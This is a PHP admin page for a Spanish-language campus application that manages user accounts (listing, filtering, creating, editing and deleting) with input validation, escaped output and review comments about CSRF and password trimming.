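<?php

declare(strict_types=1);

/*
 * Admin page: list, create, update and delete user accounts.
 *
 * Request flow handled below:
 *   GET  ?edit=<id>             pre-fills the form with an existing user
 *   POST action=delete          removes a user (never the account in use)
 *   POST action=create|update   validates and saves the form, then redirects
 *   GET  ?q=&role=&status=      filters the listing
 *
 * The helpers used here (require_role, get_flash/set_flash, redirect,
 * current_user, the admin_* / get_admin_* functions, e(), base_url()) are
 * provided by the files required next; their exact contracts are not
 * visible in this file.
 */

require_once dirname(__DIR__, 2) . '/config/app.php';
require_once ROOT_PATH . '/helpers/functions.php';
require_once ROOT_PATH . '/helpers/auth.php';
require_once ROOT_PATH . '/helpers/admin_users.php';

// Only administrators may reach this page; require_role() is assumed to end
// the request for anyone else.
require_role('admin');

$pageTitle = 'Usuarios';
$navbarTitle = 'Gestión de usuarios';
$currentPage = 'users';

$validRoles = ['admin', 'student'];
$validStatuses = ['active', 'inactive', 'blocked'];

// Minimum length accepted for a password set from this page (local policy,
// applied on create and whenever a new password is supplied on update).
$passwordMinLength = 8;

$errors = [];
$formData = [
    'id' => '0',
    'full_name' => '',
    'email' => '',
    'role' => 'student',
    'geographic_department_id' => '',
    'status' => 'active',
    'password' => '',
];

$flashSuccess = get_flash('success');
$flashError = get_flash('error');

// --- Edit mode (GET ?edit=<id>) ---------------------------------------------
$editId = (int) ($_GET['edit'] ?? 0);
if ($editId > 0 && $_SERVER['REQUEST_METHOD'] !== 'POST') {
    $editingUser = get_admin_user_by_id($editId);
    if ($editingUser === null) {
        set_flash('error', 'El usuario seleccionado no existe.');
        redirect('admin/users.php');
    }

    $formData = [
        'id' => (string) ($editingUser['id'] ?? 0),
        'full_name' => (string) ($editingUser['full_name'] ?? ''),
        'email' => (string) ($editingUser['email'] ?? ''),
        'role' => (string) ($editingUser['role'] ?? 'student'),
        'geographic_department_id' => (string) ($editingUser['geographic_department_id'] ?? ''),
        'status' => (string) ($editingUser['status'] ?? 'active'),
        // The stored credential is never echoed back into the form.
        'password' => '',
    ];
}

// --- Form submission (POST) -------------------------------------------------
// NOTE(review): the forms on this page send no anti-CSRF token; confirm that a
// shared helper (e.g. in auth.php) enforces one before the handlers below run.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $action = (string) ($_POST['action'] ?? 'create');
    $userId = (int) ($_POST['id'] ?? 0);
    $currentUserId = (int) (current_user()['id'] ?? 0);

    if ($action === 'delete') {
        if ($userId <= 0 || !admin_user_exists($userId)) {
            set_flash('error', 'El usuario seleccionado no existe.');
            redirect('admin/users.php');
        }
        // An administrator must not remove the account they are logged in with.
        if ($userId === $currentUserId) {
            set_flash('error', 'No puedes eliminar tu propia cuenta.');
            redirect('admin/users.php');
        }

        try {
            delete_admin_user($userId);
            set_flash('success', 'Usuario eliminado correctamente.');
            redirect('admin/users.php');
        } catch (Throwable $e) {
            set_flash('error', 'No se pudo eliminar el usuario.');
            redirect('admin/users.php');
        }
    }

    // Any other action is a save: update when an id was posted, create otherwise.
    $formData = [
        'id' => (string) $userId,
        'full_name' => trim((string) ($_POST['full_name'] ?? '')),
        'email' => strtolower(trim((string) ($_POST['email'] ?? ''))),
        'role' => trim((string) ($_POST['role'] ?? 'student')),
        'geographic_department_id' => trim((string) ($_POST['geographic_department_id'] ?? '')),
        'status' => trim((string) ($_POST['status'] ?? 'active')),
        // NOTE(review): trimming silently alters passwords that contain leading
        // or trailing spaces; keep this only if the login path trims the same way.
        'password' => trim((string) ($_POST['password'] ?? '')),
    ];
    $isEditMode = (int) $formData['id'] > 0;

    if ($formData['full_name'] === '') {
        $errors[] = 'El nombre del usuario es obligatorio.';
    }
    if ($formData['email'] === '') {
        $errors[] = 'El correo electrónico es obligatorio.';
    } elseif (!filter_var($formData['email'], FILTER_VALIDATE_EMAIL)) {
        $errors[] = 'El correo electrónico no tiene un formato válido.';
    }
    if (!in_array($formData['role'], $validRoles, true)) {
        $errors[] = 'El rol seleccionado no es válido.';
    }
    if (!in_array($formData['status'], $validStatuses, true)) {
        $errors[] = 'El estado seleccionado no es válido.';
    }
    if ($isEditMode && !admin_user_exists($userId)) {
        $errors[] = 'El usuario seleccionado no existe.';
    }
    // Mirror the delete guard: the logged-in administrator cannot demote or
    // deactivate their own account and lock themselves out.
    if ($isEditMode && $userId === $currentUserId
        && ($formData['role'] !== 'admin' || $formData['status'] !== 'active')) {
        $errors[] = 'No puedes cambiar el rol o el estado de tu propia cuenta.';
    }

    // A password is mandatory on create and optional on update; whenever one
    // is supplied it must satisfy the local length policy.
    $passwordSupplied = $formData['password'] !== '';
    if (!$isEditMode && !$passwordSupplied) {
        $errors[] = 'La contraseña es obligatoria para nuevos usuarios.';
    } elseif ($passwordSupplied && mb_strlen($formData['password']) < $passwordMinLength) {
        $errors[] = sprintf('La contraseña debe tener al menos %d caracteres.', $passwordMinLength);
    }

    // Uniqueness is checked last so a malformed e-mail never reaches the lookup.
    if (empty($errors) && admin_email_exists($formData['email'], $userId)) {
        $errors[] = 'Ya existe un usuario con este correo electrónico.';
    }

    if (empty($errors)) {
        $payload = [
            'full_name' => $formData['full_name'],
            'email' => $formData['email'],
            'role' => $formData['role'],
            'geographic_department_id' => $formData['geographic_department_id'],
            'status' => $formData['status'],
        ];
        // On update an empty password means "keep the current one".
        if ($passwordSupplied) {
            $payload['password'] = $formData['password'];
        }

        try {
            if ($isEditMode) {
                update_admin_user($userId, $payload);
                set_flash('success', 'Usuario actualizado correctamente.');
            } else {
                create_admin_user($payload);
                set_flash('success', 'Usuario creado correctamente.');
            }
            redirect('admin/users.php');
        } catch (Throwable $e) {
            // Fall through and re-render the form with the submitted values.
            $errors[] = 'No se pudo guardar el usuario en este momento.';
        }
    }
}

// --- Listing filters (GET) --------------------------------------------------
$search = trim((string) ($_GET['q'] ?? ''));
$roleFilter = trim((string) ($_GET['role'] ?? 'all'));
$statusFilter = trim((string) ($_GET['status'] ?? 'all'));
// Unknown filter values degrade to "no filter" (null) instead of reaching the query.
$roleParam = in_array($roleFilter, $validRoles, true) ? $roleFilter : null;
$statusParam = in_array($statusFilter, $validStatuses, true) ? $statusFilter : null;

$userRows = [];
$listError = null;
$geographicDepartments = [];
try {
    $userRows = get_admin_users($search !== '' ? $search : null, $roleParam, $statusParam);
    $geographicDepartments = get_geographic_departments_for_select();
} catch (Throwable $e) {
    $listError = 'No se pudo cargar la información de usuarios.';
}

// Recomputed here because a failed save leaves $formData with the posted id.
$isEditMode = (int) $formData['id'] > 0;

include ROOT_PATH . '/includes/layout/header.php';
?>
<?php include ROOT_PATH . '/includes/layout/sidebar_admin.php'; ?>
<div class="main-panel">
    <?php include ROOT_PATH . '/includes/layout/navbar.php'; ?>
    <main class="content-area">
        <section class="hero-panel mb-4">
            <div>
                <p class="hero-tag mb-2">Administración de Acceso</p>
                <h2 class="h3 fw-bold mb-2">Gestión de Usuarios</h2>
                <p class="mb-0 text-muted">Crear, editar y administrar cuentas de administradores y estudiantes.</p>
            </div>
        </section>

        <?php if ($flashSuccess): ?>
            <div class="alert alert-success" role="alert"><?= e($flashSuccess) ?></div>
        <?php endif; ?>
        <?php if ($flashError): ?>
            <div class="alert alert-danger" role="alert"><?= e($flashError) ?></div>
        <?php endif; ?>
        <?php if (!empty($errors)): ?>
            <div class="alert alert-danger" role="alert">
                <strong>Revisa el formulario:</strong>
                <ul class="mb-0 mt-2">
                    <?php foreach ($errors as $error): ?>
                        <li><?= e($error) ?></li>
                    <?php endforeach; ?>
                </ul>
            </div>
        <?php endif; ?>

        <div class="card card-campus mb-4">
            <div class="card-header-campus">
                <h3 class="h6 mb-0"><?= $isEditMode ? 'Editar usuario' : 'Nuevo usuario' ?></h3>
                <?php if ($isEditMode): ?>
                    <a href="<?= e(base_url('admin/users.php')) ?>" class="btn btn-sm btn-outline-success">Cancelar edición</a>
                <?php endif; ?>
            </div>
            <div class="card-body">
                <form class="row g-3" method="post" novalidate>
                    <input type="hidden" name="action" value="<?= $isEditMode ? 'update' : 'create' ?>">
                    <input type="hidden" name="id" value="<?= e($formData['id']) ?>">
                    <div class="col-md-6">
                        <label class="form-label">Nombre completo</label>
                        <input type="text" class="form-control" name="full_name" maxlength="255" required value="<?= e($formData['full_name']) ?>" placeholder="Ej: Juan García">
                    </div>
                    <div class="col-md-6">
                        <label class="form-label">Correo electrónico</label>
                        <input type="email" class="form-control" name="email" maxlength="255" required value="<?= e($formData['email']) ?>" placeholder="usuario@campus.local">
                    </div>
                    <div class="col-md-4">
                        <label class="form-label">Rol</label>
                        <select class="form-select" name="role" required>
                            <option value="student" <?= $formData['role'] === 'student' ? 'selected' : '' ?>>Estudiante</option>
                            <option value="admin" <?= $formData['role'] === 'admin' ? 'selected' : '' ?>>Administrador</option>
                        </select>
                    </div>
                    <div class="col-md-4">
                        <label class="form-label">Departamento (estudiantes)</label>
                        <select class="form-select" name="geographic_department_id">
                            <option value="">Sin asignar</option>
                            <?php foreach ($geographicDepartments as $dept): ?>
                                <option value="<?= e((string) $dept['id']) ?>" <?= (string) $formData['geographic_department_id'] === (string) $dept['id'] ? 'selected' : '' ?>>
                                    <?= e((string) $dept['name']) ?>
                                </option>
                            <?php endforeach; ?>
                        </select>
                    </div>
                    <div class="col-md-4">
                        <label class="form-label">Estado</label>
                        <select class="form-select" name="status" required>
                            <option value="active" <?= $formData['status'] === 'active' ? 'selected' : '' ?>>Activo</option>
                            <option value="inactive" <?= $formData['status'] === 'inactive' ? 'selected' : '' ?>>Inactivo</option>
                            <option value="blocked" <?= $formData['status'] === 'blocked' ? 'selected' : '' ?>>Bloqueado</option>
                        </select>
                    </div>
                    <div class="col-md-6">
                        <label class="form-label"><?= $isEditMode ? 'Contraseña (dejar en blanco para no cambiar)' : 'Contraseña' ?></label>
                        <!-- autocomplete="new-password" keeps the browser from filling in the
                             administrator's own saved credential as the new user's password. -->
                        <input type="password" class="form-control" name="password" autocomplete="new-password" minlength="<?= (int) $passwordMinLength ?>" <?= !$isEditMode ? 'required' : '' ?> placeholder="Contraseña temporal">
                        <?php if ($isEditMode): ?>
                            <small class="text-muted d-block mt-1">Solo completa si deseas cambiar la contraseña.</small>
                        <?php endif; ?>
                    </div>
                    <div class="col-12 text-end">
                        <button type="submit" class="btn btn-campus">
                            <i class="fa-solid fa-floppy-disk me-1"></i><?= $isEditMode ? 'Actualizar usuario' : 'Crear usuario' ?>
                        </button>
                    </div>
                </form>
            </div>
        </div>

        <div class="card card-campus">
            <div class="card-header-campus">
                <h3 class="h6 mb-0">Listado de usuarios</h3>
            </div>
            <div class="card-body border-bottom">
                <form method="get" class="row g-2 align-items-end">
                    <div class="col-12 col-md-5">
                        <label class="form-label mb-1">Buscar</label>
                        <input type="text" class="form-control" name="q" value="<?= e($search) ?>" placeholder="Nombre o correo electrónico">
                    </div>
                    <div class="col-12 col-md-3">
                        <label class="form-label mb-1">Rol</label>
                        <select class="form-select" name="role">
                            <option value="all" <?= $roleFilter === 'all' ? 'selected' : '' ?>>Todos</option>
                            <option value="admin" <?= $roleFilter === 'admin' ? 'selected' : '' ?>>Administrador</option>
                            <option value="student" <?= $roleFilter === 'student' ? 'selected' : '' ?>>Estudiante</option>
                        </select>
                    </div>
                    <div class="col-12 col-md-2">
                        <label class="form-label mb-1">Estado</label>
                        <select class="form-select" name="status">
                            <option value="all" <?= $statusFilter === 'all' ? 'selected' : '' ?>>Todos</option>
                            <option value="active" <?= $statusFilter === 'active' ? 'selected' : '' ?>>Activo</option>
                            <option value="inactive" <?= $statusFilter === 'inactive' ? 'selected' : '' ?>>Inactivo</option>
                            <option value="blocked" <?= $statusFilter === 'blocked' ? 'selected' : '' ?>>Bloqueado</option>
                        </select>
                    </div>
                    <div class="col-12 col-md-2 d-flex gap-2">
                        <button type="submit" class="btn btn-campus flex-grow-1">Filtrar</button>
                        <a href="<?= e(base_url('admin/users.php')) ?>" class="btn btn-outline-success">Limpiar</a>
                    </div>
                </form>
            </div>
            <?php if ($listError !== null): ?>
                <div class="card-body">
                    <div class="alert alert-danger mb-0" role="alert"><?= e($listError) ?></div>
                </div>
            <?php elseif (empty($userRows)): ?>
                <div class="card-body text-center py-5">
                    <i class="fa-solid fa-inbox mb-3" style="font-size: 2rem; color: var(--campus-gray-500); opacity: 0.5"></i>
                    <p class="mb-0 text-muted">No hay usuarios para los filtros seleccionados.</p>
                </div>
            <?php else: ?>
                <div class="table-responsive">
                    <table class="table align-middle mb-0">
                        <thead>
                            <tr>
                                <th>Nombre</th>
                                <th>Correo electrónico</th>
                                <th>Rol</th>
                                <th>Departamento</th>
                                <th>Estado</th>
                                <th class="text-end">Acciones</th>
                            </tr>
                        </thead>
                        <tbody>
                            <?php foreach ($userRows as $user): ?>
                                <?php
                                $roleBadge = admin_user_role_badge((string) ($user['role'] ?? ''));
                                $statusBadge = admin_user_status_badge((string) ($user['status'] ?? ''));
                                ?>
                                <tr>
                                    <td><?= e((string) ($user['full_name'] ?? '')) ?></td>
                                    <td><?= e((string) ($user['email'] ?? '')) ?></td>
                                    <td><span class="badge <?= e($roleBadge['class']) ?>"><?= e($roleBadge['label']) ?></span></td>
                                    <td><?= e((string) ($user['geographic_department_name'] ?? 'Sin asignar')) ?></td>
                                    <td><span class="badge <?= e($statusBadge['class']) ?>"><?= e($statusBadge['label']) ?></span></td>
                                    <td class="text-end">
                                        <a href="<?= e(base_url('admin/users.php?edit=' . (int) $user['id'])) ?>" class="btn btn-sm btn-outline-success">
                                            <i class="fa-solid fa-pen-to-square me-1"></i>Editar
                                        </a>
                                        <form method="post" style="display: inline;" onsubmit="return confirm('¿Estás seguro de que deseas eliminar este usuario? Esta acción no se puede deshacer.');">
                                            <input type="hidden" name="action" value="delete">
                                            <input type="hidden" name="id" value="<?= (int) $user['id'] ?>">
                                            <button type="submit" class="btn btn-sm btn-outline-danger">
                                                <i class="fa-solid fa-trash me-1"></i>Eliminar
                                            </button>
                                        </form>
                                    </td>
                                </tr>
                            <?php endforeach; ?>
                        </tbody>
                    </table>
                </div>
            <?php endif; ?>
        </div>
    </main>
</div>
<?php include ROOT_PATH . '/includes/layout/footer.php'; ?>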